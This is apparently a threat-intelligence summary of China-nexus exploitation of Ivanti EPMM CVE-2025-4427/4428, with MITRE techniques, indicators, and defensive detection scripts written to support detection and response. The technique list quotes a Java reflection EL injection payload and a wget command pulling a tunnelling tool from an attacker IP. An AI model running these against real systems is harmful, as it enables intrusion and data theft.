Two critical vulnerabilities (CVE-2025-4427 and CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM) have been actively exploited by a China-nexus espionage group, enabling unauthenticated remote code execution and widespread data exfiltration. The threat actors deployed KrustyLoader malware and leveraged AWS S3 buckets for payload delivery while targeting organizations across multiple critical sectors globally. #IvantiEPMM #KrustyLoader #AutoColor #ChinaNexusEspionage
Key points
- Ivanti disclosed two critical vulnerabilities (CVE-2025-4427 and CVE-2025-4428) in Endpoint Manager Mobile (EPMM) 12.5.0.0 and earlier, enabling unauthenticated remote code execution.
- Active exploitation by a China-nexus espionage group has targeted internet-facing Ivanti EPMM systems since May 15, 2025, affecting sectors such as healthcare, telecommunications, and government globally.
- Threat actors exploited the /mifs/rs/api/v2/ endpoint using Java Reflection to execute arbitrary commands and establish reverse shells for persistent access.
- KrustyLoader malware was deployed via compromised AWS S3 buckets and used to load an AES-encrypted Sliver backdoor directly into memory for covert persistence.
- Actors accessed the mifs database with hardcoded MySQL credentials to exfiltrate sensitive information including PII, LDAP data, and Office 365 tokens for lateral movement and espionage.
- A Fast Reverse Proxy (FRP) tool was installed to enable internal network reconnaissance and lateral movement within compromised environments.
- Indicators link the attacks to known China-nexus infrastructure and to the command-and-control infrastructure of the Auto-Color Linux backdoor.
MITRE Techniques
- [T1210] Exploitation of Remote Services – Exploited unauthenticated remote code execution vulnerabilities in Ivanti EPMM's /mifs/rs/api/v2/ endpoint using Java Reflection commands to gain initial access ('${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("REMOTE-COMMAND").waitFor()}').
- [T1059] Command and Scripting Interpreter – Used reflective Java expressions to execute system commands and read their output for command-and-control communications ('${"".getClass().forName("java.util.Scanner").getConstructor…').
- [T1105] Ingress Tool Transfer – Downloaded malware payloads using wget, curl, and fetch utilities from public AWS S3 buckets ('openrbf.s3.amazonaws.com', 'tkshopqd.s3.amazonaws.com').
- [T1547] Boot or Logon Autostart Execution – Achieved persistence by executing KrustyLoader and decrypting Sliver backdoor payloads directly in memory.
- [T1005] Data from Local System – Extracted sensitive data including IMEI, phone numbers, and authentication tokens from the mifs database using hardcoded MySQL credentials ('/mi/files/system/.mifpp').
- [T1021] Remote Services – Installed and used Fast Reverse Proxy (FRP) to establish a persistent reverse proxy tunnel for network reconnaissance and lateral movement ('wget http://103.244.88[.]125:8080/frpc -o /tmp/.alog').
- [T1560] Archive Collected Data – Dumped the memory heap and exported database contents to files disguised as JPG images for exfiltration ('whoami > /mi/tomcat/webapps/mifs/images/Hq8weo.jpg').
- [T1071] Application Layer Protocol – Utilized DNS tunneling through ns1.cybertunnel[.]run for communication and data exfiltration.
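The two host-side artefacts the technique list describes, EL-injection requests against the /mifs/rs/api/v2/ endpoint (T1210/T1059) and command output parked under the web root with a .jpg name (T1560), can both be hunted for with a short script. The following is an added example written for this page, not code from the report or from Ivanti; the access-log lines and file contents are constructed, the endpoint path "query" and parameter "q" are placeholders rather than the actual vulnerable route, and the detection keys only on the reflection method names the page itself lists.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Tomcat/Apache combined access-log style; not real traffic.
# The first two carry a Java EL expression in a query parameter of the /mifs/rs/api/v2/
# endpoint, URL-encoded the way a web server logs it. The path "query" and parameter
# "q" are placeholders, not the real vulnerable endpoint.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [16/May/2025:10:02:11 +0000] "GET /mifs/rs/api/v2/query?q=%24%7B%22%22.getClass%28%29.forName%28%22java.lang.Runtime%22%29%7D HTTP/1.1" 200 512
203.0.113.7 - - [16/May/2025:10:02:12 +0000] "GET /mifs/rs/api/v2/query?q=%24%7B%22%22.getClass%28%29.forName%28%22java.util.Scanner%22%29%7D HTTP/1.1" 200 1024
198.51.100.4 - - [16/May/2025:10:05:01 +0000] "GET /mifs/rs/api/v2/query?q=devices&limit=10 HTTP/1.1" 200 2048
198.51.100.9 - - [16/May/2025:10:06:40 +0000] "GET /mifs/images/Hq8weo.jpg HTTP/1.1" 200 77
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
# A "${...}" expression that reaches into reflection. The method names are the ones the
# page's TTP list shows (getClass/forName/getMethod/getRuntime/invoke/exec/getConstructor).
EL_REFLECTION_RE = re.compile(
    r'\$\{.*?\b(getClass|forName|getMethod|getRuntime|invoke|exec|getConstructor)\s*\(',
    re.IGNORECASE | re.DOTALL,
)


def decode_target(target: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyse_access_log(text: str) -> list:
    """Return one finding per request to /mifs/rs/api/v2/ whose decoded target holds an
    EL expression that calls into Java reflection."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        target = decode_target(m["target"])
        if not target.startswith("/mifs/rs/api/v2/"):
            continue
        hit = EL_REFLECTION_RE.search(target)
        if hit:
            findings.append({"line": lineno, "src": m["src"], "status": m["status"],
                             "method_hit": hit.group(1), "target": target})
    return findings


JPEG_MAGIC = b"\xff\xd8\xff"


def looks_like_jpeg(data: bytes) -> bool:
    return data[:3] == JPEG_MAGIC


def find_disguised_images(files: dict) -> list:
    """Return paths ending in .jpg/.jpeg whose content does not start with the JPEG magic,
    i.e. text or dump output stored under an image name."""
    return sorted(p for p, data in files.items()
                  if p.lower().endswith((".jpg", ".jpeg")) and not looks_like_jpeg(data))


# Constructed file contents for the web root: one genuine JPEG header, one text dump.
SAMPLE_FILES = {
    "/mi/tomcat/webapps/mifs/images/logo.jpg": JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00",
    "/mi/tomcat/webapps/mifs/images/Hq8weo.jpg": b"root\n",
}

if __name__ == "__main__":
    for f in analyse_access_log(SAMPLE_ACCESS_LOG):
        print("EL injection attempt:", f)
    for p in find_disguised_images(SAMPLE_FILES):
        print("non-JPEG content under image path:", p)
```

On a real appliance the same two functions would be fed the Tomcat access log and a walk of the mifs images directory; a status 200 on a flagged request is worth treating as a successful execution until the response body proves otherwise, since the page notes the actors read command output back through the same channel.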
Indicators of Compromise
- [IP Address] Malicious infrastructure – 103.244.88[.]125 (hosted the FRP binary), 27.25.148[.]183 (China-hosted; used in prior SAP NetWeaver exploitation), 146.70.87[.]67:45020 (Auto-Color C2 server), 124.223.202[.]90 (Tencent Cloud backend for DNS tunneling).
- [File Hash] KrustyLoader samples – 44c4a0d1826369993d1a2c4fcc00a86bf45723342cfd9f3a8b44b673eee6733a, 7a4e0eb5fbab9709c8f42beb322a5dfefbc4ec5f914938a8862f8e26a31d30a5, and 2 more hashes.
- [File Hash] Decrypted Sliver backdoor sample – 29ae4fa86329bf6d0955020319b618d4c183d433830187b80979d392bf159768.
- [File Hash] Malicious Linux Bash scripts used for MySQL dumping – 64764ffe4b1e4fc5b9fe27b513e02f0392f659c4e033d23a4ba7a3b7f20c6d30, b422645db18e95aa0b4daaf5277417b73322bed306f42385ecfd6d49be26bfab.
- [Domain] AWS S3 buckets used to deliver KrustyLoader – openrbf.s3.amazonaws[.]com, tnegadge.s3.amazonaws[.]com, fconnect.s3.amazonaws[.]com, trkbucket.s3.amazonaws[.]com, the-mentor.s3.amazonaws[.]com, tkshopqd.s3.amazonaws[.]com.
- [Domain] Staging URL for encrypted Sliver backdoor – http://abbeglasses.s3.amazonaws[.]com/dSn9tM.
- [Domain] Hosting for malicious script used in database dumping – https://dpaste[.]com/9MQEJ6VYR.txt.
- [Domain] DNS tunneling nameserver – ns1.cybertunnel[.]run (associated with Yak Bridge service).
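The indicator list above is only useful once it is refanged and swept across telemetry. The script below is an added example for this page, not tooling from the report's authors: it carries the page's IP, domain and SHA-256 indicators verbatim in defanged form, refangs them, and matches them against constructed DNS, proxy and file-inventory records. Subdomain matching under the listed names is an assumption of this example (DNS tunnelling queries would sit beneath the tunnel domain), and the hits on dpaste[.]com and on the S3 bucket host names are triage leads, since both are public services.

```python
import re

# Indicators exactly as the page lists them (defanged). Everything else below is constructed.
IOC_IPS = ["103.244.88[.]125", "27.25.148[.]183", "146.70.87[.]67", "124.223.202[.]90"]
IOC_DOMAINS = [
    "openrbf.s3.amazonaws[.]com", "tnegadge.s3.amazonaws[.]com", "fconnect.s3.amazonaws[.]com",
    "trkbucket.s3.amazonaws[.]com", "the-mentor.s3.amazonaws[.]com", "tkshopqd.s3.amazonaws[.]com",
    "abbeglasses.s3.amazonaws[.]com",
    "dpaste[.]com",            # public paste service: a hit is a lead, not a conviction
    "ns1.cybertunnel[.]run",   # DNS tunnelling nameserver
]
IOC_SHA256 = {
    "44c4a0d1826369993d1a2c4fcc00a86bf45723342cfd9f3a8b44b673eee6733a",  # KrustyLoader
    "7a4e0eb5fbab9709c8f42beb322a5dfefbc4ec5f914938a8862f8e26a31d30a5",  # KrustyLoader
    "29ae4fa86329bf6d0955020319b618d4c183d433830187b80979d392bf159768",  # decrypted Sliver
    "64764ffe4b1e4fc5b9fe27b513e02f0392f659c4e033d23a4ba7a3b7f20c6d30",  # MySQL dump script
    "b422645db18e95aa0b4daaf5277417b73322bed306f42385ecfd6d49be26bfab",  # MySQL dump script
}


def refang(ioc: str) -> str:
    """Turn the defanged form used in reports back into a matchable value."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()


IP_SET = {refang(i) for i in IOC_IPS}
DOMAIN_SET = {refang(d) for d in IOC_DOMAINS}

IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Hostname-like tokens whose last label is alphabetic, so bare IPs are not picked up here.
HOST_RE = re.compile(r"(?<![\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![\w-])", re.IGNORECASE)


def scan_line(line: str) -> list:
    """Return sorted, de-duplicated (kind, indicator) hits for one telemetry line."""
    hits = set()
    for ip in IPV4_RE.findall(line):
        if ip in IP_SET:
            hits.add(("ip", ip))
    for host in HOST_RE.findall(line):
        h = host.lower()
        for d in DOMAIN_SET:
            # Assumption: a query for a label beneath a listed domain counts as a hit,
            # which is what DNS tunnelling through that nameserver would look like.
            if h == d or h.endswith("." + d):
                hits.add(("domain", d))
                break
    return sorted(hits)


def scan_logs(lines: list) -> list:
    """Return (index, hits) for every line with at least one indicator match."""
    out = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            out.append((i, hits))
    return out


def match_hashes(inventory: dict) -> dict:
    """inventory maps path -> sha256 hex; return only the entries on the IOC list."""
    return {p: h.lower() for p, h in inventory.items() if h.lower() in IOC_SHA256}


# Constructed telemetry (not real logs): DNS and proxy records from two hosts.
SAMPLE_LINES = [
    "2025-05-16T10:07:02Z dns host=epmm01 qname=openrbf.s3.amazonaws.com qtype=A",
    "2025-05-16T10:07:03Z dns host=epmm01 qname=x7q.ns1.cybertunnel.run qtype=TXT",
    "2025-05-16T10:08:10Z proxy host=epmm01 dst=103.244.88.125:8080 url=http://103.244.88.125:8080/frpc ua=Wget",
    "2025-05-16T10:09:00Z dns host=ws42 qname=www.example.com qtype=A",
    "2025-05-16T10:10:00Z proxy host=ws42 dst=93.184.216.34:443 url=https://www.example.com/",
]

# Constructed file inventory; the all-zero digest is a placeholder for an unrelated file.
SAMPLE_INVENTORY = {
    "/tmp/.alog": "0" * 64,
    "/tmp/x": "44C4A0D1826369993D1A2C4FCC00A86BF45723342CFD9F3A8B44B673EEE6733A",
}

if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LINES):
        print(idx, SAMPLE_LINES[idx], "->", hits)
    print(match_hashes(SAMPLE_INVENTORY))
```

The hash lookup is case-insensitive because EDR and forensic tools disagree on digest casing; the hidden-path /tmp/.alog entry is included to show that a file name from the report with an unknown digest is not a hash match and has to be examined on its own.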